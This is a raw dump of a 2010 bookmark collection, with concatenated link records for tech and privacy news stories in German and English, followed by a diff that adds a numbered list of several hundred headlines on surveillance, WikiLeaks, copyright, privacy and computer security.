[LWN.net]http://lwn.net/Articles/376793/page_shots/2010/03/18/apples-patent-attack-lwnnet.pngapples-patent-attack-lwnnet11012010-03-18 16:19:491apple patent phoneYahoo patents News Feedshttp://news.yahoo.com/s/nf/20100226/tc_nf/71887page_shots/2010/03/18/yahoo-patents-news-feeds.pngyahoo-patents-news-feeds11012010-03-18 16:17:371facebook patentheise online - Merkelphones kommen sich näherIm vergangenen Jahr hatte die Bundesregierung Rahmenverträge über die Lieferung von Kryptohandys dieser Firmen mit einem Volumen von 21 Millionen Euro abgeschlossen.<p>Im vergangenen Jahr hatte die Bundesregierung Rahmenverträge über die Lieferung von Kryptohandys dieser Firmen mit einem Volumen von 21 Millionen Euro abgeschlossen. +</p>http://www.heise.de/newsticker/meldung/Merkelphones-kommen-sich-naeher-938510.htmlpage_shots/2010/03/18/heise-online-merkelphones-kommen-sich-naher.pngheise-online-merkelphones-kommen-sich-naher11012010-03-18 16:15:291crypto merkel phoneWikileaks im Visier von US-Militärgeheimdienst In einem 30 Seiten langen Bericht (PDF-Datei) untersucht das Counterintelligence Center der US-Armee (ACIC) geheime Dokumente zum Irak-Krieg und Guantanamo Bay, die Wikileaks veröffentlicht hatte und macht verschiedene Vorschläge, wie gegen die Plattform vorgegangen werden soll. + +Kern: Trust in WL erschüttern, Angst vor Enttarnung machen.<p>In einem 30 Seiten langen Bericht (PDF-Datei) untersucht das Counterintelligence Center der US-Armee (ACIC) geheime Dokumente zum Irak-Krieg und Guantanamo Bay, die Wikileaks veröffentlicht hatte und macht verschiedene Vorschläge, wie gegen die Plattform vorgegangen werden soll. +</p> +<p>Kern: Trust in WL erschüttern, Angst vor Enttarnung machen. +</p>http://www.heise.de/newsticker/meldung/Wikileaks-im-Visier-von-US-Militaergeheimdienst-955451.htmlpage_shots/2010/03/18/wikileaks-im-visier-von-us-militargeheimdienst-.pngwikileaks-im-visier-von-us-militargeheimdienst-11012010-03-18 16:03:301wikileaksMicrosoft Was Behind Google Complaints To EC | eWEEK Europe UKhttp://www.eweekeurope.co.uk/news/microsoft-was-behind-google-complaints-to-ec-5555page_shots/2010/03/18/microsoft-was-behind-google-complaints-to-ec-ew.pngmicrosoft-was-behind-google-complaints-to-ec-ew11012010-03-18 15:59:141google microsoft Microsoft: Don't press F1 key in Windows XPhttp://www.computerworld.com/s/article/9164038/Microsoft_Don_t_press_F1_key_in_Windows_XPpage_shots/2010/03/19/-microsoft-dont-press-f1-key-in-windows-xp.png-microsoft-dont-press-f1-key-in-windows-xp11012010-03-18 15:45:441exploit microsoft windowsCryptome Paypal account blockedhttp://cryptome.org/0001/cryptome-sar.htmpage_shots/2010/03/18/cryptome-paypal-account-blocked.pngcryptome-paypal-account-blocked11012010-03-18 15:30:151paypalFacebook founder Mark Zuckerberg of hacking into the email accounts of rivals and journalistshttp://www.businessinsider.com/how-facebook-was-founded-2010-3page_shots/2010/03/18/facebook-founder-mark-zuckerberg-of-hacking-into-t.pngfacebook-founder-mark-zuckerberg-of-hacking-into-t11012010-03-18 15:26:251facebook privacy322Tbit/sec Router available ciscohttp://www.computerworld.com/s/article/9168058/Cisco_unveils_next_Internet_core_routerpage_shots/2010/03/18/322tbitsec-router-available-cisco.png322tbitsec-router-available-cisco11012010-03-18 15:21:331hardware routerARM based iPad clones on the wayhttp://www.computerworld.com/s/article/9168418/ARM_sees_over_50_new_iPad_like_devices_out_this_yearpage_shots/2010/03/18/arm-based-ipad-clones-on-the-way.pngarm-based-ipad-clones-on-the-way11012010-03-18 15:14:351apple hardware ipadFilter company doesn't belive in filteringhttp://www.arnnet.com.au/article/339394/filter_trial_vendor_sceptical_over_internet_clean-feed/?fp=4194304&fpid=1page_shots/2010/03/18/filter-company-doesnt-belive-in-filtering.pngfilter-company-doesnt-belive-in-filtering11012010-03-18 15:10:571censorship25 years anniversary of 1st .com addresshttp://news.bbc.co.uk/2/hi/technology/8567414.stmpage_shots/2010/03/18/25-years-anniversary-of-1st-com-address_.png25-years-anniversary-of-1st-com-address11012010-03-18 15:07:581anniversary domain historicPirate Bay legal action dropped in Norway - Legislation/regulation/privacy - ComputerworldUKhttp://www.computerworlduk.com/management/government-law/legislation/news/index.cfm?newsid=19371page_shots/2010/03/18/pirate-bay-legal-action-dropped-in-norway-legisl.pngpirate-bay-legal-action-dropped-in-norway-legisl11012010-03-18 14:59:381piratebayheise online - US-Strafverfolger nutzen soziale Netzwerke für verdeckte Ermittlungenhttp://www.heise.de/newsticker/meldung/US-Strafverfolger-nutzen-soziale-Netzwerke-fuer-verdeckte-Ermittlungen-956796.htmlpage_shots/2010/03/18/heise-online-us-strafverfolger-nutzen-soziale-ne.pngheise-online-us-strafverfolger-nutzen-soziale-ne11012010-03-18 14:56:351crime socialnetMac OS X: "geringeres Risiko, aber letztlich unsicherer"Der Sicherheitsexperte Charlie Miller will auf einen Schlag rekordverdächtige 20 Zero-day-Sicherheitslücken in Apple Mac OS X veröffentlichen. <p>Der Sicherheitsexperte Charlie Miller will auf einen Schlag rekordverdächtige 20 Zero-day-Sicherheitslücken in Apple Mac OS X veröffentlichen. +</p>http://www.heise.de/newsticker/meldung/Mac-OS-X-geringeres-Risiko-aber-letztlich-unsicherer-957594.htmlpage_shots/2010/03/18/mac-os-x-geringeres-risiko-aber-letztlich-unsic.pngmac-os-x-geringeres-risiko-aber-letztlich-unsic31012010-03-18 13:54:2710day mac securityHacker Disables More Than 100 Cars Remotely | Threat Level | Wired.comhttp://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/page_shots/2010/03/18/hacker-disables-more-than-100-cars-remotely-thre.pnghacker-disables-more-than-100-cars-remotely-thre11012010-03-18 12:26:141hackVideo für WikipediaPetition um Video in die Wikipedia zu bekommen. Catch: Kann nur freies Format sein. Die [Open Video Allianz](http://openvideoalliance.org/ "OVA") hängt auch mit drin.<p>Petition um Video in die Wikipedia zu bekommen. Catch: Kann nur freies Format sein. Die <a href="http://openvideoalliance.org/" title="OVA">Open Video Allianz</a> hängt auch mit drin. +</p>http://www.videoonwikipedia.org/page_shots/2010/03/18/video-fur-wikipedia.pngvideo-fur-wikipedia21012010-03-18 11:37:261standard video wikipedia diff --git a/data.27c3/pm.html b/data.27c3/pm.html new file mode 100644 index 0000000..615ad19 --- /dev/null +++ b/data.27c3/pm.html @@ -0,0 +1,564 @@ + + + + + + +561Need a new reason to be creeped out by Facebook?
+560BBC News - Two million US PCs recruited to botnets
+559heise online - Bericht: Easycash verkauft Bewegungsprofile von EC-Kartenkunden
+558How To: Brew beer in a coffee maker, using only materials found on a modestly sized oceanographic research vessel
+557Canon's printer/photocopier blocks jobs based on keywords
+556More on the T-Mobile G2 "rootkit" -- it's actually a "NAND Lock" (and it's still a ripoff)
+555gulli.com - news - view - Stuttgart 21: Systematische Loschung von Beweisvideos?
+554gulli.com - news - view - Ende der Webcam-Affare: Schule zahlt 600.000 US-Dollar Entschadigung
+553gulli.com - news - view - Deutsche Telekom lie Kundenbewertungen falschen
+552gulli.com - news - view - Zensur: Wikimedia lie Artikel bei Telepolis loschen! (Update)
+551gulli.com - news - view - Microsoft: Kein Internet fur infizierte Rechner
+550gulli.com - news - view - Angreifer loschten samtliche Dokumente auf Cryptome (Update)
+549Foxconn Bericht uber Arbeitsbedingungen
+548Tatort Redaktion – der Lynchmob wird losgelassen F!XMBR
+547Grocery terminals slurped payment card data The Register
+546Snuggly the Security Bear Speaks on Internet Wiretapping
+545heise online - Microsoft und Partner stellen Smartphones mit Windows Phone 7 vor
+544"Deleted" Facebook photos still not deleted: a followup
+543Depubliziertes offentlich rechtl. Sendungsmaterial
+542India to build cyber attack proof operating system
+541Zoom for audio enables you to hear a single conversation in huge crowd
+540heise online - Bundestag lasst Tablets zu
+539T-Mobile sneaks "rootkit" into G2 phones - reinstalls locked-down OS after jailbreaking
+538Alex Halderman's totally epic hack of the DC internet voting system pilot program
+537Sky Marshals to lose their cushy first-class seats?
+536Britisches Verteidigungsministerium warnt vor Facebook Places
+535Human society is not more violent today than in the past
+534Football star's cereal has phone sex number on box
+533Slashdot Science Story | United Nations Names Ambassador To Aliens
+532Microsoft's DRM helps the hacker - Oops | TechEye
+531Canadian-Iranian blogger sentenced to 19 years in prison - The Globe and Mail
+530heise online - Segway-Eigentumer stirbt offenbar bei Segway-Unfall
+529Microsoft kooperiert mit Wordpress - "Eindrucksvoll" - N24.de
+528OpenOffice.org community members launch the Document Foundation [LWN.net]
+527U.S. Tries to Make It Easier to Wiretap the Internet - NYTimes.com
+526Heatball :: Home
+525gulli.com - news - view - Vier Monate Gefangnis fur Facebook-Freundschaft
+524Evercookie: a tracking browser cookie you can't delete
+523Brighton, England town council says that councillor is violating copyright law by youtubing the council meetings
+522Multinational copyright companies will require French ISPs turn over 150,000 subscriber names and addresses per day
+521Microsoft's DRM makes your computer vulnerable to attack
+520Andreas Pfitzmann ist tot
+519Thomas de Maiziere macht den Schauble 2.0 : netzpolitik.org
+518Wettbewerb « #zensus11 Stoppt die Vollerfassung!
+517Thomas de Maiziere macht den Schauble 2.0 : netzpolitik.org
+516Google Instant Blacklist
+515Soll die Lorracher Tatwaffe verkauft werden?
+514Beginn der ACTA-Verhandlungsrunde in Tokyo : netzpolitik.org
+513Patent Office Agrees With EFFs Arguments on C2 VoIP Patent | Electronic Frontier Foundation
+512Trojaner „stuxnet“: Der digitale Erstschlag ist erfolgt - Digitales Denken - Feuilleton - FAZ.NET
+5114chan invades Tea Party website The Register
+510Microsoft sounds alert on massive Web bug
+509Intel Testing $50 Processor Upgrades at Point of Purchase | We Got Served
+508Das Web wird schneller mit script defer
+507Dawkins empfiehlt ThePirateBay
+5064chan Users Crash MPAA Website in Pro-Piracy Protest
+505heise online - Lucke im Linux-Kernel ermoglicht Root-Rechte
+504The 6502 Microprocessor Turns 35 « adafruit industries blog
+503Privacy tool for Iranians withdrawn amid security concerns The Register
+502Is Stuxnet the 'best' malware ever?
+501Slashdot Hardware Story | HDCP Master Key Is Legitimate; Blu-ray Is Cracked
+500Google engineer accesses teen emails: What's the damage for Google? | ZDNet
+499Damning Zuckerberg IMs confirmed
+498Is Steve Jobs a Ninja?
+497UK government hands 500M copyright enforcement and censorship tab to nation's Internet users
+496PA Homeland Security gave names of anti-drill activists to drilling company
+495Piratenpartei veroffentlicht Indect Dokumente
+494Jean-Luc Godard donates 1K for accused MP3 downloader's defense: "There is no such thing as intellectual property"
+493HDCP master-key leaks, possible to make unrestricted Blu-Ray recorders
+492Google search index splits with MapReduce The Register
+491gulli.com - news - view - Personalausweis: Schuler loschen Chip mit einfachsten Mitteln
+490Auf der Suche nach dem sicheren Datenhafen - heute.de Nachrichten
+489Above the Law - Russia Uses Microsoft to Suppress Dissent - NYTimes.com
+488No, you don't own it: Court upholds EULAs, threatens digital resale
+487robots learn when a situation might call for some less-than-honest behavior
+486DHS Cybersecurity Watchdogs Miss Hundreds of Vulnerabilities on Their Own Network | Threat Level | Wired.com
+485Swedish cops' attempt to build database of shoe-treads snarled in copyright law
+484European Parliament Asks EU ACTA Negotiators to Protect Citizens' Fundamental Rights | Electronic Frontier Foundation
+483Is Sarah Palin a Computer Criminal? | Electronic Frontier Foundation
+482Report: Abu Ghraib photos Obama is censoring "show rape" and sexual torture of men, women, and children
+481Secret copyright treaty: USA caves on border laptop/phone/MP3 player searches for copyright infringement
+480What parents worry about, what parents should worry about
+479Your password are stars - hehe
+478No Medal of Honor for US Military
+476FOXNews.com - EXCLUSIVE: WikiLeaks Founder Julian Assange Fights Calls to Step Down
+475Adobe Reader zero-day attack – now with stolen certificate - Securelist
+474Mathias Dopfner uber das Netz: "Freiheit von innen bedroht" - taz.de
+473Web 2.0 Selbstmord Maschine : netzpolitik.org
+472Piratenpartei veroffentlicht INDECT-Dokumente: EU forscht im Geheimen am Uberwachungsstaat | Piratenpartei Deutschland
+471Grune starten Hackerangriff auf FDP : netzpolitik.org
+470Virginia Court of Appeals: law enforcement should have the right to track criminal suspects with GPS, even without a warrant.
+469ACLU + NYCLU are challenging the [US] government's claimed authority to search, detain, and copy electronic devices at the country's international borders without any suspicion of wrongdoing.
+468Bundesweites Zentralregister ab 2013: GEZ soll vollen Zugriff auf Daten erhalten | NGZ-Online
+467Courts May Require Search Warrants for Cell Phone Location Records
+466Latest leaked draft of secret copyright treaty: US trying to cram DRM rules down the world's throats
+465Globe Genie: random teleporter for Google Street View
+464Whiskey from diabetics' urine
+463heise online - Internet Explorer: Datenklau durch zwei Jahre alte Lucke
+462Duke Nukem Forever: Und der King kommt doch (Update) - Golem.de
+461AMD switching to easy peel-off laptop stickers Computer Chips & Hardware Technology | Geek.com
+460PM under fire for new Bill. Washington would control who boards Canadian flights over U.S.
+459Loschwelle fur Linuxtag – Veranstaltungen auf Wikipedia - Gisbers.de - fur diejenigen, die es interessiert…
+458Spamers are pinging
+457EU-Kommission diskutiert Inhaltefilter/DPI gegen p2p : netzpolitik.org
+456Google Wave Developer Blog: Wave open source next steps: "Wave in a Box"
+455Pentagon declined to investigate hundreds of purchases of child pornography | The Upshot Yahoo! News - Yahoo! News
+454Preschoolers being radio-tagged
+453Datenklo Nachbau
+452heise online - Burgerrechtler: Vorratsdatenspeicherung laut Kriminalitatsstatistik uberflussig
+451Ping review / Analyse von spiegel.de
+450Microsoft Patents Operating System Shutdown | ConceivablyTech
+449NRW: Grune wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen Pottblog
+448Source Code des PS3-Hacks veroffentlicht
+447Algerian Hackers Attack Wrong Website - ITProPortal.com
+446Obama administration: "Piracy is flat, unadulterated theft"
+445Judge: No Difference Between Cell Phone Tracking and GPS Vehicle Tracking
+444Welcome to Evoke 2010 » Evoke 2010
+443Hackers blind quantum cryptographers
+442For Immediate Release: GATES FOUNDATION INVESTS IN MONSANTO - Community Alliance for Global Justice
+441Killerspiele sollen als Politiker-Ausrede wegfallen - The Inquirer DE
+440Google, Facebook To Microsoft’s Paul Allen: Your Argument Is Invalid
+439Nokia Siemens slammed for supplying snoop tech to Iran The Register
+438Glibc Is Finally Free Software
+437Kapitulationserklarung gegenuber Kinderschandern - Arbeitskreis gegen Internet-Sperren und Zensur (AK Zensur)
+436Drogeriekette: 150.000 Kundendaten von Schlecker waren frei zuganglich - SPIEGEL ONLINE - Nachrichten - Wirtschaft
+435US movie tickets get biggest price hike in history
+4342010 smashes vulnerability records - V3.co.uk - formerly vnunet.com
+433Bad flash drive caused worst U.S. military breach | InSecurity Complex - CNET News
+432Pirate Bay has stolen 46x the amount of USD that exist
+431USA setzen mobile Nacktscanner auf der Strae ein : netzpolitik.org
+430Streetview and the Church: The world belongs to God, not Google.
+429Cat-trashing lady outed by internet in less than 24 hours - Boing Boing
+428Full-Body Scan Technology Deployed In Street-Roving Vans
+427Die beste Verschlusselung fur eine Nachricht… : netzpolitik.org
+426Steve Jobs Is Watching You: Apple Seeking to Patent Spyware | Electronic Frontier Foundation
+425Elektronischer Personalausweis: CCC findet Schwachstelle in Lesegerät - Golem.de
+424Yemeni assassin hits York man with spam death threat The Register
+42315 Facts About Net Neutrality [Infographic]
+422heise online - Die Menschheit auf eine neue Stufe bringen: zum 60. Geburtstag von Steve Wozniak
+421GVLN Rao Blog » Blog Archive » The “Ugly face” of the ECI: Arrest of Hari Prasad for sting demonstration
+42020 Minuten Online - So argert man Neonazis - Ausland
+419Report: Trojan a factor in fatal Spanair crash? | Security - CNET News
+418Blocked Street View Images in Germany May Get Published - NYTimes.com
+417HD Moore: Critical bug in 40 different Windows apps | ZDNet
+416USB Dongle Claims to Deliver First Easy Hack for PS3 | Gadget Lab | Wired.com
+415Apple may be looking to lock out unauthorized iOS users
+414Datenleck bei Versicherung: Tausende Kundendaten im Netz
+413heise online - Intel kauft McAfee
+412Einstieg der Musikindustrie in die US-Debatte zur Netzneutralitat : netzpolitik.org
+411Wikipedia verliert seine Autoren: Der Reiz des Anfangs ist verloren - Digitales Denken - Feuilleton - FAZ.NET
+410Rheinland-Pfalz vor Quellen-TKU und Online-Durchsuchung
+409Medal of Honor ahmt Irak-Video "Collateral Murder" nach
+408ThaiLeaks
+407Pirate Party Strikes Hosting Deal With Wikileaks | TorrentFreak
+406Duisburg scheitert an Bloggern - Aufruhr im Netz
+405Eric Schmidt: nur Namenwechsel wird uns in Zukunft helfen
+404Silent Bug Fixing vom Feinsten
+403Google TV: US-Sender befurchteten dass ihre Sendungen in der Flut der Internet-Inhalte untergehen
+402Prosecutor: no charges in webcam spy scandal
+401Club Mate zur Loschung in WP vorgeschlagen
+400First smartphone trojan detected
+399Scientists hack into cars' computers -- control brakes, engine - CSMonitor.com
+398NetworkSolutions Sites Hacked By Wicked Widget — Krebs on Security
+397Government Uses Social Networking Sites for More than Investigations | Electronic Frontier Foundation
+396Targeted Attack Nets 3,000 Online Banking Customers - DarkReading
+395Germany bans BlackBerrys and iPhones on snooping fears The Register
+394eco-Positionspapier zur Netzneutralitat : netzpolitik.org
+393Worlds first 20 minute voice call from a Free Software GSM stack on a phone
+392Polizeigewerkschaft will Google-Streetview fur virtuelle Streifenfahrten nutzen
+391Researchers use smudge attack, identify Android passcodes 68 percent of the time | ZDNet
+390Hacker pretends to be Axl Rose and Cancels Guns N Roses Tour Via Twitter on Spoonfed - Things to do in London
+389Datenschutz-Problem gelost: Einfach mal den Namen andern : netzpolitik.org
+388RIAA will zwangsweise UKW-Empfanger in Handies
+387Skype: Programmierer knackt Skype-Protokoll
+386Oracle sues Google
+385RIP Open Solaris
+384A Review of Verizon and Google's Net Neutrality Proposal | Electronic Frontier Foundation
+383heise online - Britische Regierung: Internet Explorer 6 ist sicher genug
+382Schon wieder: Remote Code Execution Vulnerabilities in Adobe Flash
+381Piraten-Vorstand verschiebt Liquid-Democracy-Start : netzpolitik.org
+380Firefox 4 beta crack ruse spreads Trojan to total idiots The Register
+379Court Rejects Warrantless GPS Tracking | Electronic Frontier Foundation
+378eBay photocopier data risk ignored The Register
+377Private browsing modes in four biggest browsers often fail The Register
+376Sachsische Zeitung [online] - Politik: Nazi-Angriff auf Buchenwald kam aus Pirna
+375Apparatus for Facilitating the Birth of a Child by Centrifugal Force
+374Kindle Stories from Real Users « Me and My Kindle
+373BusyBox takes out bankrupt opponent in GPL lawsuit
+372Surprise! Feds stored thousands of checkpoint body scan images after all
+371UK government: Upgrading away from IE6 costs too much
+370Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
+369heise online - US-Burgerrechtler sammeln weiter Argumente gegen Nacktscanner
+368Collateral Murder-Video: Erstaunliche Wendung in Sachen Wikileaks - Medien - Feuilleton - FAZ.NET
+367Bing Adds Open Street Map
+366RIAA, FBI issuing takedown requests for Radiohead's "In Rainbows"
+364Microsoft quashed IE privacy controls for the ad industry
+363FBI will Wikipedia Nutzung seines Logos untersagen : netzpolitik.org
+362Homebrew-Tool gegen kritische iPhone-PDF-Lucke
+361Botnet with 60GB of stolen data cracked wide open The Register
+360Panne in Tschechien: Namen Tausender Agenten im Internet veroffentlicht - SPIEGEL ONLINE - Nachrichten - Politik
+359Londoner Polizei wurde beim falschen von CCTV-Videos erwischt : netzpolitik.org
+358BlackBerry encryption too secure National security vs. consumer privacy
+357Man faces jail for videotaping gun-waving cop
+356heise online - CCC: Wir kommen in Frieden
+355heise online - Apple beantragt Patente fur Reise- und Mode-Apps
+354heise online - IMSI-Catcher fur 1500 Euro im Eigenbau
+353heise online - US-Behorden verhoren Wikileaks-Aktivisten
+352heise online - WPA2-Lucke: ARP-Spoofing im WLAN
+351Researcher demonstrates ATM "jackpotting" at Black Hat Conference
+350100 million Facebook users' details published online - Technology & science - Security - msnbc.com
+349Google nabs patent to monitor your cursor movements - Search giant ogles cursor monitoring for refined search results | TechEye
+348Google Alarm
+347"Indexing and retrieval of blogs" patented by Google
+346heise online - Massenerkrankung in Foxconn-Werk
+345vowe dot net :: Lug und Trug von 1&1
+344Pork-Filled Counter-Islamic Bomb Device
+343Terrorismusexperte warnt vor C++
+342UK ISP TalkTalk Monitoring its Customers Online Activity Without Consent − ISPreview UK
+341Georgische Wirtschaftsministerin tanzt Striptease
+340EFF wins enormous victory against DRM: legal to jailbreak iPhones, rip DVDs for mashup videos
+339Enthullung brisanter Kriegsdokumente: Die Afghanistan-Protokolle - SPIEGEL ONLINE - Nachrichten - Politik
+338heise online - Anwalte kritisisieren De-Mail
+337SkullSecurity » Blog Archive » Return of the Facebook Snatchers
+336AppleInsider | US government legalizes iPhone 'jailbreaking,' unlocking
+335Hackers shut down EU carbon-trading website | Environment | guardian.co.uk
+334Bremer Proteste gegen Datensammlung | WESER-KURIER
+333Nord-Datenschutz-Chef: Volkszahlung uberflussig - Nachrichten Newsticker - dpa_nt - regioline_nt - hamburgschleswigholstein_nt - WELT ONLINE
+332AGBs der DE-Mail
+331Yes Men documentary goes online via Bittorrent to evade censorship
+330Amiga: 25 Years Later
+32942 finale Thesen zum Internet | 137b zeitweise
+328Turn an inkjet into a 3D printer - Boing Boing
+327Pentagon workers tied to child porn - The Boston Globe
+326Spam Filtering? Patented! 36 Companies Sued | Techdirt
+324heise online - LNK-Lucke in Windows: Angriffswelle rollt an
+323Gegenentwurf zum Beschaftigtendatenschutz-Gesetzentwurf online
+322Hospital: files with personal, medical data on 800,000 gone - SC Magazine US
+321South African doctor invents anti-rape female condoms with teeth
+319Australian government blocks out 90% of document on web-spying plans
+318iPhone : 15-Jahriger trickste Apple aus | Digital | ZEIT ONLINE
+317Responsible Disclosure ist jetzt Coordinated Vulnerability Disclosure
+316Internet erst ab 22 Uhr geoeffnet
+315Apple the new world leader in software insecurity
+314Dell warns on spyware infected server motherboards The Register
+313Google Online Security Blog: Rebooting Responsible Disclosure: a focus on protecting end users
+312How a 15-yo Kid Tricked Apple With a Disguised iPhone Tethering App
+311De-Mail: Freund liest mit? : netzpolitik.org
+310W-Lan-Erfassung: Apple nutzt iPhone-Besitzer als Umgebungsscanner - SPIEGEL ONLINE - Nachrichten - Netzwelt
+309Telepolis pnews: Antiterrorgesetz dient britischen Kommunen zum Durchsuchen von Mulltonnen
+308EU fuhrt Open-Source-Projekte fort
+307CCC | Forderungen fur ein lebenswertes Netz
+306Neue Trendsportart: Facebook als Datenbank benutzen.
+305D: Kriminalbeamte fur Internet-Ausweispflicht - futurezone.ORF.at
+304Cyber-Spanner beobachtet Schulerinnen uber deren Webcams
+303DNSSEC in der DNS-Rootzone gestartet
+302Droid X actually self-destructs if you try to mod it
+301Chile becomes first country to guarantee net neutrality, we start thinking about moving -- Engadget
+300Datenschutzprobleme bei DE-Mail
+299Thousands of laptops stolen from US military contractor | Security Threats | ZDNet UK
+298Daten-Speicherung.de – minimum data, maximum privacy » Boykottiert das glaserne De-Mail!
+297BBC News - China Green Dam web filter teams 'face funding crisis'
+296heise online - 15 Jahre ".mp3"
+295apple loescht Kritik
+294Microsoft seeks patent on ebook page flip The Register
+293Dubai airports nix full-body scanners "out of respect for privacy of individuals and personal freedom"
+292Consumer Group Sniffs Congresswoman’s Open Wi-Fi | Threat Level | Wired.com
+291NetApp threatens Coraid over sales of open-source ZFS technology — EnterpriseStorageForum.com
+290NTP sues smartphone giants over wireless e-mail patents
+289SWIFT ist durch
+288UH computer breach exposes personal data - Pacific Business News (Honolulu)
+287kamera review in Dresden
+286iPhone on fire
+285Cisco looses attendee db
+284Ubuntu priv escalation bug
+283heise online - The Pirate Bay: 4 Millionen Nutzerdatensatze abgegriffen
+282default snmp community strings
+281Glocks stolen out of Israeli PM's bodyguard's luggage on American Airlines flight
+280Entity Crisis: Python + Wiimote + 30 tonnes of Steel
+279Zwei Bildschirme: Amazon bekommt Patent auf E-Book-Reader - Golem.de
+278TSA blocks "controversial opinion" from its internal network
+277Iran declares war on mullets, ponytails for men; approves of hair gel and Elvis 'dos
+276W00t! sends Associated Press a bill for quoting its blog
+275US will press criminal charges against Manning, alleged Wikileaks source
+274Microsoft Spurned Researcher Collective founded
+273iPad Flash hack spotted in the wild | TG Daily
+272Online tax scam gang get 40 years The Register
+271Another Apple iPhone 4 Flaw: A Glitchy Proximity Sensor - PCWorld
+270Hacker forced to cancel HiTB presentation due to legal threats by ATM vendors - ByteMods.com
+269App Store, Hacked. (Updated)
+268ZGeek - We put the "M" in stupid - Comedy Central censors Futurama's jab at Apple
+267Little Spiderman uses vacuum cleaners to climb buildings, win the hearts of the ladies -- Engadget
+266Foursquare cared a lot more about $20M than your privacy
+265letzte 2 Space Shuttle Fluege
+264Bkis Blog » Adobe fix still allows “Escape from PDF”
+263Google: Flash stays on YouTube, and here's why The Register
+262Russian spy ring bust uncovers tech toolkit The Register
+261Nokia snaffles user data on the down-low The Register
+260heise online - Geolocatoren werden zum Datenschutzproblem
+259Jobs at Apple: Antenna designer
+258Oklahoma police tase an 86-year-old bedridden grandmother
+257Toronto's secret ID law used to arrest G20 protestor
+256Young people, risky behavior and the net: the facts
+255Regwall cuts The Times's online readership in half
+254EU secretly pushing to put kids in jail for sharing music: ACTA leak
+253Frankreich: Bewahrungsstrafe fur Twitter-Hacker | tagesschau.de
+252Does Uncle Sam really need 1,100 data centers?
+251Technology firms 'more trusted than traditional media' - Telegraph
+250Viacom vs. Internet: round one to Internet
+249Australian Government To Force Internet Users To Install State-Approved Software | NewWORLDLiberty
+248heise online - Burgerrechtler wollen gegen Volkszahlung 2011 klagen
+247heise online - "Das Gluck, dass meiner zuerst lief" Zum 100. Geburtstag von Konrad Zuse
+246Twitter on a ZX Spectrum The Register
+245Technik-Streit - iPad-Nutzung im Bundestag sorgt fur Arger - Politik - Berliner Morgenpost
+244Amazon has officially patented the "Social Networking System"
+243Schadcode bei ilse-aigner.de? - Qbi's Weblog
+242New Bill Would Let Obama Police Internet for National Security Reasons - The Daily Beast
+241MS betreibt Babyklappe fur Daten
+240HTTPS Everywhere: Firefox plugin that switches on crypto whenever it's available
+239Verleger: Leistungsschutzrecht soll Sprache monopolisieren : netzpolitik.org
+238Printer fur Internetausdrucker
+237BBC News - Armed police at Merseyside school after FBI warning
+236Google to Commies: Well make censorship illegal The Register
+235Federal Bureau of Investigation – Featured Fugitives - Cyber Crimes
+234Nmap Development: Always practice safe software: a lesson from UnrealIRCd
+233US-Gesetzesinitiative: Obamas Notfall-Ausschalter furs Internet - SPIEGEL ONLINE - Nachrichten - Netzwelt
+232Ministerprasidenten unterzeichnen den Jugendmedienschutz-Staatsvertrag
+231Wireless signals to be jammed in Canada for G8 summit The Register
+230OpenSSL-Updates beseitigen Schwachstellen
+229Apple's Worst Security Breach: 114,000 iPad Owners Exposed
+228Deleting Facebook accounts doesn't
+227Crooks siphon $644,000 from school district's bank account The Register
+226Windows Help used as attack surface - The H Security: News and Features
+225Mass hack plants malware on thousands of webpages The Register
+224Microsoft explains mystery Firefox extension, "fixes" update
+22331/05/10 - Consultation on development of a data security breach code of practice - Data Protection Commissioner - Ireland
+222Adobe - Security Advisories: Security Advisory for Flash Player, Adobe Reader and Acrobat
+221Linux Today - Memo From Dell: Ubuntu Linux Safer Than Microsoft Windows
+220Apple Outsider Hello, Lua
+219SCOwned: no new trial, Novell can shut down IBM lawsuit
+218Hintergrund zum exFAT Treiber von Tuxera
+217Which companies are phasing out PVC and BFRs | Greenpeace International
+216Olympus Stylus Tough camera carries malware infection | Graham Cluley's blog
+215Foxconn Scrapping Suicide Compensation To Stop Deaths
+214heise online - 15 Jahre PHP
+213Google tries to patent tech that snoops Wi-Fi networks The Register
+2123 men charged in $100m scareware scam The Register
+211FTC asks Google not to destroy documents about Wi-Fi data collection - latimes.com
+210U.S. intelligence analyst investigated for allegedly divulging classified information
+209Fake gegen Fake: Wie die Horst-Kohler-Satire verschwand - taz.de
+208Russias Anti-Spam Chief Faces Spamming Charges - SPAMfighter
+207Nicht nur nackte Tatsachen: Was Apple alles zensiert - n-tv.de
+206heise online - Samsung Wave mit Virus ab Werk - aber nur in Deutschland
+205Slashdot Technology Story | EU To Monitor All Internet Searches
+204heise online - Luc Besson arbeitet bei neuem Film mit Internet-Community zusammen
+203Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability.
+202no more win at google
+201das grosse Loschen
+200Webcam knows how to snub shoulder surfers
+199Blogs sturzen Bundesprasident?
+198Freie Bahn fur Softwarepatente
+197iPhone gibt Daten an fremde Rechner weiter
+196facebook-telefonbuch-grabscher
+195If You See Something, Think Twice About Saying Something
+194heise online - Zugangsdaten von 44 Millionen Online-Spielern gestohlen
+193voting machine @Texas Legislation
+192The Escapist : News : Warner Bros. Sued for Pirating Anti-Piracy Technology
+191Save the Children Finnland in Verteilung von Kinderpornografie verstrickt
+190heise online - Forscher infiziert sich mit Computervirus
+189School's Laptop Spying Software Exploitable from Anywhere
+188IBM distributes malware-infested freebies at AusCERT
+187Ireland's largest ISP begins disconnecting users who are accused of piracy
+186DARPA trying to beat block lists, deep packet inspection The Register
+185Encrypted Google search coming to a browser near you
+184Fraud Bazaar Carders.cc Hacked — Krebs on Security
+183Report: Facebook caught sharing secret data with advertisers
+182Empire Strikes 30: Ars looks back at an amazing film
+181Pac-Man is 30! Celebrate along with... Google?
+180heise online - IBM verteilt auf Sicherheitskonferenz infizierte USB-Sticks
+179Clegg vows to restore British privacy - V3.co.uk - formerly vnunet.com
+178Most browsers silently expose intimate viewing habits The Register
+177School Spy Program Used on Students Contains Hacker-Friendly Security Hole | Threat Level | Wired.com
+176Humanistische Union: Publikationen: Grundrechte-Report: Ausgaben: Archiv: GRR 2010
+175heise online - Frequenzauktion bringt 4,4 Milliarden Euro
+174A Piece of Internet History
+173RIA Novosti - Politik - International - Erfinder des ersten Geldautomaten ist tot
+172VP8 / WebM von Google veroffentlicht
+171Softwarepatent durch BGH bestatigt
+170OpenBSD 4.7 released
+169Example for on-line activism
+168Wikileaks is back
